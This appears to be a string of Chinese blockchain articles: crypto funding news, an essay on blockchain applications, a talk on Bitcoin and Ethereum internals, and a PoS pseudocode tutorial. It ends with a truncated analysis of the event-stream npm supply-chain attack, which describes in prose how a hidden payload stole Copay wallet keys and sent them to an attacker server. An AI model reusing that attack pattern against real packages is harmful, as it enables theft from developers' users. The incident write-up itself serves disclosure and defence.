生态研究院参与了此次融资。这笔资金将用于推动技术进步,扩大全球运营,并加强CESS在去中心化基础设施领域的地位。CESS是一个融合了区块链网络和去中心化存储系统的平台,旨在支持Web3的全球去中心化数据服务,包括需要高端安全性、性能、存储和数据检索的大规模商业应用。Cosmos生态模块化代币发行平台Eclipse Fi融资190万美元,Big Brain Holdings等参投Cosmos 生态模块化代币发行平台 Eclipse Fi 完成 190 万美元融资,参与者包括 Big Brain Holdings、Rarestone Capital、Momentum 6、NxGen、Crypto Banter、Cogitent Ventures、Token Metrics、Kyros Ventures、Faculty Group、Master Ventures、Ivan on Tech、Brian D Evans、Danish Chaundry、Gainzy 等。Eclipse 旨在通过智能账户和跨链架构等功能来解决 Launchpad 的跨链用户体验和可持续性问题。BRC20基础设施BRC20.com完成150万美元融资,UTXO Management领投BRC20基础设施项目BRC20.com宣布完成150万美元融资,UTXO Management(Bitcoin Magazine母公司BTC Inc.的资产管理部门)领投,其他参投方包括Zanshin Capital Management、Unbroken Chain、One Block Capital、Sora Ventures、OWL Ventures、Bitcoin Frontier Fund、Hamble和New Tribe Capital等。该项目计划推出一款移动应用,支持用户桥接、交易和质押BRC-20代币,并为新的DeFi协议发布去中心化中继网络。其他加密矿业:加密矿企HIVE Digital完成约2178万美元私募融资加密矿企HIVE Digital Technologies Ltd.(HIVE)宣布完成此前宣布的买断式私募融资,总共发行了575万个特别认股权证(Special Warrants),每个认股权证定价为5加元,总计筹集资金达2875万加元(约合2178万美元)。这笔资金将用于支持其比特币挖矿业务的增长,以及扩大其绿色挖矿足迹。特别认股权证及其所代表的单位(Unit)将遵守适用的证券法规定的四个月零一天的法定持有期。每个特别认股权证将授予持有者获得一个单位,每个单位包含一股公司普通股和半个普通股购买认股权证。每个完整的认股权证将使持有者有权以6加元的价格购买一股公司普通股,直到2026年12月28日。
-
区块链来了,产品经理应该做些什么? 前言:区块链可能是当今科技媒体最喜欢的话题之一,这很大程度上源于比特币在 2017 年的火爆。如果说 2017 年是比特币的一年,那 2018 很可能是区块链爆发的元年。作为产品经理,比起乱象丛生的币圈和需要技术背景的链圈,更关心的是区块链的实际应用场景。什么是区块链?假设现在 A 需要给 B 转一笔钱,他可以选择一些方式:银行卡划账、支付宝/微信转账等等。但这些方式都存在一个现有系统的问题:为了建立信任,我们需要一个第三方平台这样的系统可能存在一些问题,比如第三方系统不稳定、记录被恶意篡改……区块链技术的出现,给了这个问题一个很好的解决方案。区块链本质上是一种去中心化的分布式数据库,它不依赖于某一中心节点,所有参与到区块链网络中的服务器都参与维护,除非掌握 50% 以上的节点,否则很难被破坏,因此区块链具有高安全性。同时由于区块链为链状结构,新区块中的数据中包含上一区块的信息,这部分信息变得不可修改,因此区块链也具有信息不可篡改的特点。但为了控制区块的产生速度,新区块的计算变得非常困难,因此区块链会过渡消耗能源,这也就是为什么比特币的「矿工」们会使用特定的矿机,选择在低电价的地区进行「挖矿」。关于区块链更易懂和更详实的解释,可以看这篇文章 区块链入门教程,这里不再做过多的说明。区块链的应用目前区块链最广泛的应用就是以比特币为首的各种数字货币了。但除了这些纷乱复杂的数字货币外,作为产品经理,更应该着眼于区块链技术能给实际生活带来哪些改变。下面就介绍一些区块链的应用实例。1. 支付目前金融业可能是全球中心化程度最高的产业。毫无疑问,分散式货币的好处之一就是可以不需要银行这样的第三方中介机构,而直接进行转移支付,因此在跨境汇款过程中,区块链可以派上用场。现在,我们已经可以在几分钟之内使用区块链将资金转移到全球,而不是几天,同时由于其匿名性和数据不可篡改,使得这其中的资产交易更安全,因此区块链无疑提供了一个绝佳的解决方案。但由于在金融领域,目前关于区块链的使用标准和相关法律法规还不完善,制约了区块链在支付方面的应用。因此需要区块链技术提供企业、金融参与者、监管部门、立法机构通力合作,建立有效的合作机制。2.合同使用区块链技术,可以将传统合同转换为智能合同。与传统的合约不同,智能合同由软件代码组成,并由区块链网络执行。它的优势在于,合同一旦部署之后便不能被修改,这确保了双方的协议都可以不参与,在区块链上用代码编写的智能合约是一旦被触发就完全不可改变的合约。目前已有一些平台在使用区块链技术的智能合约,如 CoinFabrik,法大大等。3.公益还记得当时的郭美美事件带来的恶劣社会性影响吗,很大原因在于公益流程中的一些环节不透明,公益活动的参与者不能监控整个流程中的每一环节。使用区块链技术,可以将公益活动的项目、资金数量、资金流向等存放在区块链中,任何人都可以查看,使公益行为更透明,为社会所监督。4.食品作为一个具有食品科学背景的人,区块链如何在食品行业中使用也是我关心的问题。目前食品安全问题已经被越来越多的人所重视,但由于食品从原材料的获取,到生产加工、包装、分销,这其中每个环节都离普通消费者很远,我们无法追溯到食品的每一个环节。假设说生产者使用了劣质的食物原材料,或者是食品供应商篡改了食品保质期信息,这些食品安全的隐患,作为消费者是无法获知的。利用区块链技术,在食品供应链环节上进行系统追踪,从原料来源,到食品制作,再到批发商和零售商,每个流程都会记录下它的原始标志符,用户使用手机 App 识别之后便可以获取食品全流程的信息,而区块链的不可篡改保证了这些信息的真实性。目前 TD-FOOD 公司已经在越南站稳脚跟,推动从农场到餐桌食品追溯系统公开,旨在重构食品供应生态。5.文娱互联网技术的发展使得文娱产业从终端设备使用、内容分发到商业获利各个环节,发生了一系列的变革,但这其中仍有部分未能很好解决的问题,例如困扰电影、电子书和数字专辑很久的版权问题。通过区块链技术,可以在这其中的各个环节进行渗透,利用分布式账本的能力来解决这个问题。目前已有一家名为 Custos Media 的企业,通过难以察觉的水印技术和区块链技术,匿名转换盗版文件的下载者和上传者,来保护数字媒体文件面授在线盗版的侵害,一旦被侵权作品出现则会立即进行通知。再比如数字媒体的分发。我们都希望在 iTunes 上购买的歌曲,或者亚马逊上购买的电子书可以作用于所有的媒体上,但目前我们购买的更多相当于是一个对应平台上的副本,不具有在其他平台上使用的能力。一家名为 OPUS 的公司是世界上第一个基于 ETH(以太坊)和 IPFS(星际文件系统) 的去中心化音乐平台。它基于以太坊的逻辑层,处理 Opus 网络上的所有交易,使得用户无论在何处购买了音乐,都可以在任何播放器上进行播放,同时对于音乐人来说,免去了流媒体平台对音乐人收入的抽成。6.云储存目前类似阿里云、腾讯云等云计算平台,为中小企业提供了数据存储的解决方案,但问题是,这些集中式云计算平台一旦出现异常或被攻击,就可能对其中存储的文件造成毁灭性打击。利用区块链技术,可以将数据存储在整个网络中成千上万的节点设备上,当需要进行检索时,系统再将数据从这些节点设备上进行整合,从而提高数据的安全性。目前开源云技术提供商 Nextcloud 便基于区块链技术退出去中心化云储存服务,保证数据安全的同时也降低了成本费用。拥抱区块链目前来看,区块链技术可能会给信息社会带来一场巨大的变革。由于其分布式和多中心的特质,使得人类社会最根本的「信用」问题得以解决,因此类似于金融证券、个人履历、医疗、教育等等可能出现信用风险的行业,都可以将区块链技术渗透其中,从而解决这些问题。我们每个人都处于这场变革中,越早拥抱区块链,越早看到未来。
-
-
区块链基本原理及其技术实现 - 姜家志 | JTalk 第五期 编者按:本文系比特大陆的姜家志讲师,在掘金技术社区主办的《给开发者的区块链技术指南 | JTalk 掘金线下活动第五期》 活动上的分享整理。掘金 JTalk 目前已举办5期,每期 JTalk 会邀请垂直行业的优秀工程师来分享优秀的实践经验,技巧方法。旨在为开发者提供线下技术交流互动机会,帮助开发者成长。姜家志,比特大陆哥白尼项目负责人;BCH 社区资深开发者;10年后端技术及互联开发经验,比太钱包Android 和 iOS 客户端的开发者; 从事区块链底层协议的研究,关注高性能、分布式系统的研发。区块链现在所有的项目都有一个很大的性能问题,需要从技术方面去克服,这是我们团队关注的一个方向,另外整个区块链产业发展很大一部分推动力是来自于密码学。 我们还有一个任务是把密码学上的一些思路和研究,在工程上进行实现。我是2013年开始接触比特币,最早接触比特币时,我接近两个星期每晚都处于睡不着觉的状态 。我本想着2015、2016年的时候比特币就应该能普及到很多人了,但经历了14、15年的熊市,觉得可能要再延后几年。出乎意料的是,2017年区块链大规模普及。今天跟大家分享一下区块链的基本原理及技术方面的实现。1. 区块链是什么?什么是区块链?给区块链一个完整定义是很难的,原因有如下两方面:现在区块链涉及的行业太多,很难给它一个很明确的定义。 区块链基本上每隔一段时间都会发生很大的改变,大家可以在上面作出更多有意思、好玩的东西。去中心化比特币最大的特点是去中心化。采用POW,比如早期的比特币、以太坊等都是使用POW,经过长达十年证明之后,POW在去中心化的实现上是最好的证明。现在出现POS、DPOS,都是在一定程度上牺牲了去中心化。DPOS采用选举制度,你所投票的人能代表你自己的想法,但并不意味着任何人能够随意的加入网络。去中心化有几个很鲜明的特点: 抗审查能力。 在整个网络活动中,对应到整个区块链里就是所发生的一笔交易,不会因为个人原因就会被拒绝,就是抗审查能力。整个网络里,即使一个矿池拒绝了你的交易,也会有其他矿池帮你打包。 当某一个网络挂了或某一些不可抗拒原因导致某个节点挂了,不会影响整个网络运转。POW、BCH、BTC、以太坊都具有这样的能力,任意一个矿池挂了,其他节点依然正常在运转,如果把所有矿池都挂了,在运行节点中的节点会重新搭建起一个全新的狂吃,这样有可能会出现整个网络处理能力的下降,但网络是不可摧毁的。DPOS这种方式肯定会牺牲以上说的两点特性,如果21节点全部被封禁了,恢复就有一定的困难性(备用节点的设计方案还有待确认)。21节点也同样的具有审查交易的能力,任何人想进入这个网络也很困难(需要通过选举)。我称这种方式为弱中心化,毕竟还是有21节点的,不是一个完全的中心化。弱中心化的设计是为了提高性能上一些指标,为了能做更多事情,牺牲了去中心化的特点。 数字化账本整个区块链都是运行在互联网上 不可更改这个特性在比特币里比较明显,在以太坊里,会出现能更改的可能性。如果一个合约在定义好之后,之后通过交易是可以改变它的状态。但这个可更改性也是之前定义好的,也就是说大家知道你的合约就是这样写的。 确定性的复制状态机简单来说就是整个网络所有节点能够拿到所有的数据。 可编程性在比特币中就有体现。在以太坊上,可编程性被进一步放大,他使用的语言是solidity,它是一种类似于JavaScript的语言。 匿名性因为每个地址/账户在整个网络里,不和真实世界中人物对应。但是因为比特币这种交易是链式的结构,如果你知道这个币给谁了,反向追踪是可以找到源头。匿名性是如果不带入真实世界里,不和真实身份的进行交易的话,是有一定的匿名性。反之,这种匿名性就会消失。这也是为什么交易所会强制做KYC严格身份认证的原因。 区块链工作原理公私钥体系 数字签名认可 全网广播 区块记录交易以交易为单位,每个交易会记录在区块链上,不会记录真实结果,这些交易本身会影响结果。 链式结构整个交易、区块都是链式结构,大家一直会往一个方向不断延伸下去,不会出现回路或分叉。 参与者确认有效性在比特币中是矿工确认交易,在EOS中是由超级节点确认交易。 区块链特征区块链是资产型网络。无论现在看到什么样的区块链项目,都运行着一个资产网络。强规则网络有如加密、签名、验证、交易和确认等操作。任何一块不符合规则的话,整个块就会被拒绝。在互联网项目中,出现不一致的情况时,后续是有修复和解决的机会;但是在区块链里,这种可能性非常低。如果出现一个很小Bug,整个网络运行都会出现问题,会对整个网络影响很大。在早期,比特币出现过几次的Bug造成了分叉,全网暂停后重新运行。但现在如果再出现类似Bug,就很严重了,因为当时比特币网络参与人员少,比特币价格低,造成的影响较小。 弱信任每个节点都有对等的,把整个区块链理解为数据库,每个节点在系统内都有写入的权限 。在对等的前提下,比特币是通过算力来决定谁能写入的更多。如果你有更大资源,能调动更大的算力,写入的概率就会很大。 信任来自于共识机制,非第三方共识机制包括POW、POS、DPOS和DAG。DAG是一种共识机制,它经过了密码学家的认可。 去中心化现在很多区块链项目在向弱中心化方向发展,弱中心化的好处也能带来对等信任的关系,这种信任网络可能产生的经济价值会有可能大于以前中心化网络带来的价值。 区块链使用数字化资产 像比特币,都是对标一种交易系统。转帐。股权。融资。数字版权。游戏。存储。如果存储解决了,上面的版权、游戏都有可能会在里面,包括新的一些应用或新的网络产生新的价值。目前都处在摸索阶段,整个业内也都有人朝这几个方向去做。 EatBCH,是一个委内瑞拉的项目。目前委内瑞拉法币已经崩溃,委内瑞拉和其他国家关系也不好,再加上国内有封锁,美元很难进入。现在面临很重要的问题是没有法币能做交易,委内瑞拉现在存在严重的饥荒,但黑市中有食物 。 他们国内有一个项目叫EatBCH,就是通过捐赠BCH给他们购买食物。整个比特币是跨国界的,只需要知道他的地址,就可以把比特币直接打给他,省去了中间环节。利用BCH 低成本网络的特点,省去手续费,几美元就可以让他们吃很久。这是一种价值网络的转移。这个项目估计让委内瑞拉400、500人受益。非洲也类似的项目。 2. 区块链技术实现公私钥我们使用的加密网络、VPN等都是公私钥体系,比特币私钥本质上是随机数,只不过这个随机数很大,有2的256次方个私钥,不可能遍历所有的私钥的。 在一个钱包里生成私钥以后,这个私钥理论上有可能被别人撞到,但实际上不可能,概率非常小。整个网络采用的是secp256k1算法。中本聪当年设计比特币时,一些加密库的实现里是美国政府认可的,他认为不是特别靠谱。HashHash是一种散列算法,相当于一个数据的指纹,我们无法从Hash里推算出原始数据是什么,因此可以实现对原始数据进行保护。如果原始数据是一致的话,Hash就是一致。不同的原始数据Hash值冲突的概率很小,基本上可以认为是不一致的。数字签名从一个原始数据里算出对应Hash,用私钥进行签名,到了验证方那里他拿到原始数据,签名数据,从原始数据中是可以算出Hash的,拿到Hash和公钥、签名之后把数据一起做验证 。这在互联网里也比较常用,邮件里使用PGP加密也是采用类似方式。在整个区块链里,签名是一个所有权认证方式。在整个区块链里,最重要的东西就是私钥,如果以后大家在使用钱包的时候一定要保证好自己的私钥。但是这面临一个很麻烦的东西,大部分人对公私钥有可能了解的比较少,小额有可能还是放到线上钱包比较好,线上钱包提供方也有很多,比如交易所就是一个很大的在线钱包。由于私钥是要自己保护的,私钥问题从早期一直存在到现在,即密码无法找回,或者没有备份等。在早期时,有人在比特币上挖矿,电脑上面有5000个、8000个都放着,电脑过了一段以后不用了,所有东西都有可能丢失了。整个比特币网络上是2100万个币,据估算找不到的就有五六百万个。地址现在很多区块链项目都在用地址,地址是经过Hash算法算出来的。在没有发送出去币的时候,地址能保证你的公钥不被外界看到,只是拿地址做收币使用,公钥不会暴露在网络上,只有当发送币时才会暴露公钥。这样带来的好处是有一天有人破了算法,能从公钥反推出私钥了 ,如果不暴露公钥,还是无法算出私钥,多了一层保护。交易比特币交易分为输入和输出,输入是这个币是那里给你的,输出是你的币要发到那里。每一个交易必须有输入,因为没有输入的话,相当于不知道这个钱是从哪里来的。除了挖矿产生的交易,这个交易是由整个共识规则产生的奖励, 这个交易是没有输入的,这个就是比特币的发行。交易本身有锁定和解锁脚本,网络上并不存地址,只关心锁定脚本,根据锁定条件有对应的解锁条件,两个加在一起才能动用你的币。脚本运行脚本运行在一个堆栈上,遇到一个脚本操作符,就会执行对应操作,如果碰到数据,又会把数据要到栈里,最终结果是保证整个栈执行出来是对的, 中间任何一个条件不满足的话,整个交易就无法运行。这是为什么整个比特币的协议, 只关心锁定条件是什么,能否拿出对应解锁条件这些的原因。如果解锁条件能够满足的话,就能动用里面的资产,如果满足不了就不能动用。UTXO和账户每个交易都有一个输入和输出,但是每一个输出有可能暂时不用,也可能一年之后用,如果不用,就会存在整个系统中,这种结构就叫做UTXO,这是比特币采用UTXO的概念,UTXO能在整个系统设计上更容易实现去中心化的特点,但是以太坊采用不是UTXO的概念,采用的是我们容易理解的账户概念,相当于你的私钥产生地址,就是你的账户,可以一直用这个账户,所有操作、所有记录都在账户下。为什么有一个UTXO和账户的概念,这里牵涉到UTXO和账户两个系统带来的一些好处。UTXO无需维护余额,因为不关心你的余额是什么,只关心它的锁定脚本是什么,有没有输入对应的解锁脚本,所以整个系统不用维护一个地址,当使用一个钱包时,显示地址里有多少余额时,都是钱包算出来的,拿到这个地址下面有多少未发生交易,加在一起就是你的余额。 每个UTXO都是独立的数据记录,提升验证交易的速度。 UTXO本身不用关心事务问题,只关心锁定脚本和解锁脚本。UTXO能够在实现上、编码上给整个系统带来很大的优化,所以比特币在实现去中心化时就非常容易。 在以太坊里要运行智能合约,相应要让每个账户有独立的存数据和取数据能力,使用UTXO这个概念的话,一个数据存了,不太容易找到他存在哪了。账户体系能解决这个问题,现在每一个账户下面都有一个kv存储,自己可以存任何想存的东西, 这样使用智能合约时更加容易实现。 BlockBlock Header包括基本数据,交易列表,交易确认是由矿工把对应交易打到块上,这就是交易的确认,所以Block概念在整个系统中运用也是很广泛的。所有块加在一起形成Blockchain的概念。3. 比特币布雷顿森林体系解体之后,美元的购买力下降98%左右。在津巴布韦发生着我们小时候看课本上的事,推一车钱去买东西,最后把钱扔了,车推走了。津巴布韦现在就处于这个状态,持续通货膨胀,导致法币体系基本崩溃。俄罗斯前几年也出现过货币大面积贬值,一段时间贬值50%左右,还有委内瑞拉。印度去年用新的货币系统替换了旧的货币系统,通过这个事情,GDP都下降了一点 。在整个世界历史上有很多国家正在发生类似这样的事情。比特币是什么?A Peer-to-Peer Electronic Cash System 2008年11月1日,由Satoshi Nakamoto发表论文 2009年1月3日,创世块诞生 (The Times 03/Jan/2009 Chancellor on brink of second bailout for banks),写了一段讽刺的话,当时英国第二次救助银行系统 2010年之后,Satoshi本人逐渐消失并人间蒸发 总量固定2100万枚 比特币发行(Coinbase)挖矿 数学保护的财富财产的绝对控制,私钥是唯一的凭据,失去私钥将失去一切。 非对称加密算法,Hash摘要算法。 海量账户,以地址(公钥)登记所有权,数量几乎无限供应。 全球无缝流通,有网络就有比特币。 无伪钞,天然审计。 比特币系统三大特征工作量证明POW,体现在算出来这个Hash值要小于给定的那个值,这个目标值就是全网去维护的,如果算力大了,还是这个目标值的话,肯定不能满足10分钟出一个块了,这个时候就要提高目标值,目标值越来越大,需要的算力就越来越多,这也是为什么现在全网算力这么大,比特币还是保持10分钟左右出块。 链式结构,体现在Block和交易上。 去中心化系统,没有一个组织能完全封杀掉整个网络或控制整个网络。 挖矿挖矿也是比特币的一种发行方式,发行交易是Coinbase交易大量尝试随机数找到符合要求数字的过程。 工作量证明(POW)的体现。 比特币的发行(Coinbase)。 高额收益。 维系比特币的支付功能,打包交易。 大算力保证比特币系统安全。在整个产业链中,付出成本最大的其实是矿工,矿工要有基础建设,要买矿机,成本比较大。 挖矿是利益驱动解决自生长问题,利益驱动,不依赖道德和感情。 消除比特币安全威胁。 在算力博弈块链的过程中,作恶导致受益下降。 利益绑定,拥有巨大算力的组织,会自发的维护系统安全。 比特币的长久发展更有利于矿工交易。 大算力保证比特币系统安全。挖矿是一个利益绑定,拥有最大的算力组织会自发维护整个系统的安全,比特币长久发展有利于矿工交易,因为矿工在这块投入的成本很高。 挖矿的历史早期是拿CPU挖矿,因为挖矿的人很少,也很少有人会在上面进行改进;后面有一些新玩家进来之后,发现显卡算力更快,就采用显卡;再后面用上了EPGA,在2012年之后就是ASIC的时代 。比特币现状极具有颠覆性的创新产物,但仍然是处于试验阶段 币值剧烈波动,还不是稳定结算单位 缺乏多数商家的支持 受众人数仍然很小 系统吞吐能力仍然很小,尚无法支撑全球大规模交易(需要扩容) 比特币极具创新性,目前还处于实验阶段,价格不稳定,现在不是稳定的结算单位。比特币缺少大部分商家支持,而且受众人群少。系统吞吐能力小,无法支撑全球大规模交易,所以需要扩容。比特币扩容历史很艰难,现在分为BCT和BCH。现在不会在扩容问题上继续争吵。 比特币扩容历史2014年Gavin提出扩容问题 Bitcoin XT (20M,太过于激进) 2016年Bitcoin Classic (2M) 2016年香港共识,矿工只运行Core的代码,SW第一次出现 禁止讨论区块扩容,路线图中只有SW没有直接区块扩容 Bitcoin Unlimited出现,最高有50%算力支持 UASH和UAHF 以太坊以太坊市值一直在不断地涨。在以太坊上存在扩容问题吗?其实以太坊区块大小一直在不断增加,以太坊随着使用增加,整个网络能处理的交易也不断增加,现在要运行以太坊节点,是必须使用SSD的硬盘的 。以太坊不断在提高自己GPSLimit。上次以太坊因为加密猫的出现,导致大面积拥堵,这是因为以太坊已经没有办法通过简单的扩容方式解决TPS问题了,所以要采用一些新的技术演进来解决。比特币如果遇到像以太坊一样拥堵问题,无法通过简单技术方案进行解决的话,大概需要到每秒100-500笔交易才会出现。上图是BTC全节点。以太坊全节点现在运行已经很困难了,比特币全节点只有1万多个,但是以太坊全节点依然有2万多个。以太坊能给很多人提供智能合约,可以在上面做更加有创造力的事情,所以大家才愿意运行以太坊的节点。4. 以太坊的智能合约智能合约1990s年代尼克萨博提出 一个可以自动执行的计算机程序 接收和回应信息,接收和存储价值,向外发送信息和价值 图灵完备的语言 以太坊智能合约 公共区块链平台 以太币是其代币 Ethereum Virtual Machine 点对点的合约 Vitalik Buterin 在2013提出 2014年ICO众筹得以发展 EVM外部账户和合约账户 每个账户有一个持久的KV存储 交易从一个账户发往另一个账户 包含代码代码,就会执行,交易相关的数据作为参数 EVM执行交易的过程中,会消耗Gas 堆栈机器stack EVM虚拟机分为外部账户和合约账户,外部账户专门用来转帐 。合约账户包含一些代码,能在每个节点被执行,交易相关数据是它的参数。如果在合约里面运行一个很长的代码, 允许它一直运行的话,会有可能把整个系统资源耗死,所以它有一个Gas的概念,要是想运行东西,就必须付钱,当付的钱消耗完了,这个合约就执行完了, 如果Gas消耗完了就不执行了,有没有结果就不关心了,这样能保证了保证整个系统安全。 SoliditySolidity是以太坊使用的类似JavaScript的高级语言 以编译的方式生成以太坊虚拟机代码 数据的每一个状态都可以永久存储 强调合约或者函数执行的调用方式 一旦出现异常,所有的执行都将被回撤 Gas消耗完合约停止 Remix无需安装的浏览器编译器 ERC 2.0ICO ERC20是一套标准接口 钱包自动支持代币 把ETH打到对应的合约地址上,自动获得代币 ERC2.0本质是一套对应的接口,适应这个接口,就能完成ICO的过程。好处是把以太坊打到对应ICO合约地址上,就能自动获取代币,这对用户来讲比较简单,所以有人在网上说5分钟教你怎么发token。 CryptoKitties 加密猫ERC721 Token 每一只猫都是一种代币 每一只猫都是独一无二的 每一只猫都有自己的基因 加密猫也是一种代币,加密猫最高成交的价格好像是1亿多,每一个猫都独一无二,因为天然是一种代币,和token一样,它还有自己的基因,这是游戏的玩法了。 5. 如何开始区块链行业构成底层协议 矿池制造 矿池 交易所 钱包 媒体 其中底层协议最关键。有一个说法,现在底层协议架构类似于98年的互联网,当时大家做各种网络协议,HTTP协议等很多,现在的区块链其实也是。 技术方向上• 优秀的编程能力 • Go,C/C• 分布式协议 • 数据库 • 编译器 • 操作系统,内核 • 密码学算法加入区块链企业是了解和学习区块链的最好方式早期区块链项目都是以开源为主,很少看到有闭源方式运行的,整个区块链其实是运行在开源社区基础上的,而区块链项目本身又是一个开源的项目,希望区块链项目未来能够给开源社区做更多贡献, 我们做的东西很多也都是开源的 。希望未来在能够形成正向循环,开源社区给区块链行业提供贡献,区块链行业产生更多的区块链项目,区块链项目本身又是开源的,又能给开源社区提供贡献。以上是《给开发者的区块链技术指南 | JTalk 掘金线下活动第五期》 讲师姜家志的分享,如果你对掘金的 JTalk 线下活动感兴趣,可以关注掘金活动页面的 JTalk 活动报名。掘金 JTalk 目前已举办5期,每月一期的 JTalk 会邀请垂直行业的优秀工程师来分享优秀的实践经验,技巧方法。旨在为开发者提供线下技术交流互动机会,帮助开发者成长。JTalk 预告JTalk 第六期即将在杭州举办。主题:从前端到“后端” 时间:5.20
-
(二)区块链的共识算法:PoS 及其 例子 代码 实现 作者:林冠宏 / 指尖下的幽灵掘金:juejin.cn/user/178526…博客:www.cnblogs.com/linguanh/GitHub : github.com/af913337456…腾讯云专栏: cloud.tencent.com/developer/u…BTW:本人技术书籍《区块链以太坊DApp开发实战》现已出版并可网购了,适合初中级区块链技术相关研发人员阅读。目录前序 PoS 共识算法 PoS 的特点 编写 PoS 代码 候选块数组 块中的节点地址 进行股权分配 根据股权选出赢家 结束 前序这篇文章是上一篇的序章,上一篇的链接地址是:juejin.cn/post/684490…(一)区块链的共识算法:整体介绍 及 分叉 的通俗讲解本篇文章将会着重介绍 PoS 共识算法和采用代码例子来实在地阐述它关于什么是共识算法这个问题,请查看(一)区块链的共识算法:整体介绍 及 分叉 的通俗讲解 ,里面已经给出了答案。PoS 共识算法PoS 全称为 Proof of Stake 股权证明。字面意思就是,股份制。就是说,谁的股份越多,谁的话事权越大,这和我们生活中的股份制公司中的股东的意思的差不多的。但是,在区块链的应用中,我们并不可能真实地分配给链中的节点股份,取而代之的是另外一些东西,这些东西充当股份,我们将这些东西分配给链中节点。下面将举一些例子来加以阐述这个概念。例如 PoS 在虚拟货币的应用中,我们可以把持币量的多少,来看作拥有股权、股份的多少,假设某条公链以拥有的 XXX 代币的数量来衡量,这个节点的股份有多少,它的话事权有多少。假设一个公链网络中,共有3个节点,A 和 B 和 C,其中 A 节点拥有10000 个 XXX 代币,而 B 和 C 分别有 1000 和 2000 个,那么在这个以太坊网络中,A 的区块是最有可能被选中的,话事权是比较大的。再例如,假设日后的某个非虚拟货币的区块链、公有链,一条实体业结合的链,例如 汽车链,我们就可以把每一位车主所拥有的车辆数目和他的车价值多少钱来分配股份,例如规定一条公式:车数*车价值 = 股份的多少,在 PoS 中股份是一个概念,一个衡量话事权的概念。PoS 的特点上面的描述已经说明了 PoS 共识算法的概念。因为它是以拥有某样东西的数量来衡量话事权的,这就意味着,只要我们的节点,拥有这类东西,哪怕拥有的只有 一个,都是有话事权的,即使很小,甚至都没机会露面,但它还是有机会。在 PoS 中,块是已经铸造好的(这里没有“挖矿”的概念,所以我们不用这个词来证明股份),PoW 是有挖矿概念的。这也就造成了它有下面的特点:优点: 缩短了共识达成的时间,链中共识块的速度更快 不再需要大量消耗能源挖矿 作弊得不尝失,因为如果一名持有 51% 以上股权的人作弊,相当于他坑了自己,因为他是拥有股权最多的人,作弊导致的结果往往是拥有着越多的损失越多 缺点: 攻击成本低,只有节点有物品数量,例如代币数量,就能发起脏数据的区块攻击 另外拥有代币数量大的节点获得记账权的概率会更大,会使得网络共识受少数富裕账户支配,从而失去公正性 编写 PoS 代码为了能让更多人,以及非 go 开发者能看懂,下面将通过 伪代码 来实现,完整的 go 代码请留邮箱。首先我们使用一个候选区块数组来保存,每一个 节点 广播过来的和自己当前节点生成的区块对象: candidateBlocks [ ]Blocks 候选区块数组 复制代码每个区块结构体里面有一个变量 是用来记录生成这个区块的节点地址的type Block struct { Timestamp string // 时间戳,代表该区块的生成时间 Hash string // 这个区块的 hash 值 PrevHash string // 这个区块的 上一个 区块的 hash 值 NodeAddress string // 生成这个区块的 节点地址 Data string // 区块携带的数据 } 复制代码然后有一个 子线程,专门负责遍历 候选区块数组,来根据区块里面的节点地址 获取 它的代币数量,然后分配股权 stakeRecord []string // 数组 for block ~ candidateBlocks { coinNum = getCoinBalance(block.NodeAddress) // 获取代币数量 for i ~ coinNum { // 币有多少,就循环添加多少次 if stakeRecord.contains(block.NodeAddress) { // 是否以及包含了 break // 包含的就不再重复添加 } stakeRecord = append(block.NodeAddress) // 添加 } } 复制代码然后从 stakeRecord 中 选出一个竞选胜利者。这个概率就和上面的 coinNum 有关,越大就越有机会。 index = randInt() // 得出一个整形随机数 winner = stakeRecord[index] // 取出胜利者节点的地址 复制代码最后,我们就能取出这个 winner 所生成的区块来进行公链的接入,然后广播出去 for block ~ candidateBlocks { if block.NodeAddress == winner { // 添加 } } // 广播出去 ... 复制代码以上,就是一个很简单的, PoS 算法机制的代码实现,单纯地根据持币数量来做股权分配。而事实上,事情往往是比较复杂的,想想一下,如果我的股权的分配,不仅仅和代币的数量有关系呢,对吧,这样的话,就能衍生各种各样的想法变种方式例如以太坊加入了币龄,在候选成功后,以太坊在这个步骤还会扣除币龄。种种的这些,都是可以变的,我们要理解 PoS 的精髓,才能在开发自己的公有链的时候,随心而行
-
篡改 npm 包盗取比特币始末 @蒋欢,美团点评前端工程师,3年工作经验,主要负责美团点评“云店助手"客户端和"美团点评智慧餐厅"小程序的开发。本文首发于 蒋欢的知乎专栏 ,敬请关注。正文从这开始~比特币钱包 Copay 被依赖链攻击这个瓜上周在技术圈里被广泛讨论,我在看了众多大神分析之后理清了前因后果。在这里也给大家来分享一波黑客是如何一步步实施他的惊人计划的。一、 背景介绍event-stream 是开源社区里一个用于处理 Node.js 流数据的 npm 包,它使得创建和使用流变得容易,正是因此,受到了广大开发者的欢迎,目前这个库上周下载量达到了165万。event-stream在npm的托管而这起事件起因是由于该项目的作者 @dominictarr 受限于时间与精力,将其维护工作交给了另一位开发者 @Right9ctrl,该开发者获得了 event-stream 的权限后,将恶意代码通过依赖项 flatmap-stream 注入到了 event-stream 中去。也正是这个依赖项引入了窃取比特币的后门。同时,著名的比特币钱包 Dash Copay 在他们的应用中引用了对 event-stream 的依赖,从而导致了中毒事件的发生。梳理下来,黑客的具体步骤如下:第一步,黑客 @right9ctrl 发邮件给这个库的原作者 @dominictarr,而他因为缺乏时间和兴趣已经不愿再维护这个库了,于是就将该库转让给了这个完全不认识的陌生人 。 原作者的解释第二步,9 月 9 日,新维护者开始了初步性的动作,首先释出了 event-stream 3.3.6 版本的更新,并在其中加入了一个全新的模块——flatmap-stream,彼时这个模块中并没有恶意功能。 第三步,9 月 16 日,@right9ctrl 删除了对 flatmap-stream 的引用并在 event-stram 里 手动实现 了这个方法,之后直接将项目从3.3.6 升级到了 4.0.0。但引用npm包的时候,很少有人直接升级大版本,也就是说 codepay 很可能会一直使用这个中毒的 event-stream 3.3.6版本。 黑客的攻击步骤第四步,10 月 5 日,flatmap-stream@0.1.1 版本被一个名为 @hugeglass 的用户推送到了 NPM。而这次释出的更新中该模块就被加入了窃取比特币钱包的用户信息和秘钥。通俗的来说就好比用户的网银账号、密码和U盾一起被盗了。 二、盗窃与曝光盗窃那么黑客的代码具体是怎么盗窃比特币的呢? 通过分析 flatmap-stream 的源码,我们可以将其分解为已下四个步骤:外部代码判断执行环境,如果是在 copay-dash 项目中运行,则将加密成16进制的内部代码进行解密并执行。 内部代码判断用户的使用环境(是否使用 Cordova),同时获取受害者的个人钱包信息。 通过遍历受害者钱包里所有的id,查找账户余额超过100 BTC(市值300万人民币)或者1000 BCH(市值125万人民币)的账户。 将受害者的账户信息和钱包秘钥分别发往部署在吉隆坡的服务器 111.90.151.134 和 